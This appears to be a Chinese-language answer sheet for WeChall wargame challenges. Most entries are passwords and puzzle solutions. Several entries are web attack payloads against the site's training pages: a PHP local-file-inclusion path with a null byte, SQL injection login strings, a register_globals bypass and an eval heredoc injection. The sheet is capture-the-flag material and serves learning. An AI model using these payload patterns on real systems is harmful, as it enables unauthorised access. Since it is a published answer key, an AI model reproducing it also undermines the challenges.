wechall.net答案
Get Sourced (Training) : html_sourcecode
Crypto - Caesar I (Crypto, Training) : PIRHMCLCHLLA
ASCII (Training, Encoding) : drebdepslihp
URL (Training, Encoding) : http://www.wechall.net/challenge/training/encodings/url/saw_lotion.php?p=bfsdfhsgimgn&cid=52#password=fibre_optics
Prime Factory (Training, Math) : 10000331000037
Encodings I (Training, Encoding) : easystarter
WWW-Robots (HTTP, Training) : http://www.wechall.net/challenge/training/www/robots/T0PS3CR3T/
Crypto - Transposition I (Crypto, Training) : iscfdrdrnchf
Crypto - Caesar II (Crypto, Training) : HGRPPSDIAAIM
Stegano I (Training, Stegano) : steganoI
Math Pyramid (Math, Training) : 18^-.5a^3 (方法不唯一)
hi (Math) : 154722098935564539692256152
Crypto - Substitution I (Crypto, Training) : pbcicccgfdrb
Stegano Attachment (Stegano, Image, Training) : BPARDEOOCBCR
PHP LFI (Exploit, PHP, Training) : https://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00
PHP 0817 (PHP, Exploit) : https://www.wechall.net/challenge/php0817/index.php?which=solution
PHP 0818 (Exploit, PHP) : 0xdeadc0de
PHP 0816 (Exploit, PHP) :
提示的意思:https://www.wechall.net/challenge/php0816/code.php?mode=hl&src=solution.php
答案:AnotherCodeflowMistake
Regex (Training, Regex) :
/^$/
/^wechall$/
/^wechall4?\.(tiff|png|jpg|bmp|gif)$/
/^(wechall4?)\.[?:tiff|png|jpg|bmp|gif]$/ Programming 1 (Training, Coding) :
用以下PY代码
import requests
url1="http://www.wechall.net/challenge/training/programming1/index.php?action=request"
url2="http://www.wechall.net/challenge/training/programming1/index.php?answer="
c={"WC":"你的cookie"}
a=requests.get(url1,cookies=c)
key=a.text
print(key)
requests.get(url2+key,cookies=c)Enlightment (Encoding) :
先实现一个八个bit为单位的ASCII转换器。
把第一个界面的三个码加起来,得到一个数组
解密获得另外一个数组
解密后得到一个串。
访问http://www.wechall.net/challenge/anto/enlightment/这个串.php
将三个数组异或后解析,获取密码:
Gimme_Da_Light
Register Globals (Exploit, PHP, Training) :
http://www.wechall.net/challenge/training/php/globals/globals.php?login[0]=admin
PHP 0819 (PHP) :
http://www.wechall.net/challenge/space/php0819/index.php?eval=%3C%3C%3Cs%0a1337%0as;%0a
Training: MySQL I (MySQL, Exploit, Training) :
用户为:admin' and 1=1 #
Training: Crypto - Digraphs (Crypto, Training) :
明文:congratulations! you decrypted this message successfully! was not too difficult either. was it? well. good job! enter this keyword as solution: sbcghgrbainb!
答案:sbcghgrbainb
Training: Baconian (Stegano, Encoding, Crypto, Training) :
将小写字母转成a,用wiki链接上的第二张表,得到明文
VERYXWELLXDONEXFELLOWXHACKERXTHEXSECRETXKEYWORDXISX************XXKVFK
VERY WELL DONE FELLOW HACKER THE SECRET KEYWORD IS ************ KVFK答案以自己实践为准(答案是随机化的)
Repeating History (Research) : InDaxInNothingHereMoveAlong
(在最古老的历史版本中!)
Training: Warchall - The Beginning (Realistic, Linux, Shell, Warchall) :
bitwarrior,LameStartup,HiddenIsConfig,RepeatingHistory,AndIknowchown,OhRightThePerms
Training: Bacon Returns (Stegano, Encoding, Crypto, Training) :
明文
YOUXCANXREADXTHEXHIDDENXMESSAGEXSOXIXWILLXTELLXYOUXTHEXSOLUTIONXWHICHXISXTWELVEXRANDOMXLETTERSX************
YOU CAN READ THE HIDDEN MESSAGE SO I WILL TELL YOU THE SOLUTION WHICH IS TWELVE RANDOM LETTERS ************仍然是按实践操作为准
Training: Caterpillar (Stegano) : COLOR-SHEMES
No Escape (Exploit, PHP, MySQL) :
http://www.wechall.net/challenge/no_escape/index.php?vote_for=bill`=111--%20`
Trivia (Research, Fun) : 手速关卡,到时限为25s后结束。
Zebra (Training, Encoding, Stegano) : saFFari
PHP 0815 (Exploit, PHP) : -0
Sudoku I (Logic) : 5a64d3187bc9248319a6c27b5d627db5c93184a9bc27843a65d181462b5ad97c3c795813d6a2b415b3c72498da6d3a96cb512478291cad874536b7c281496bda35b6da49725318ca45732db8c6193d8b56a1c4927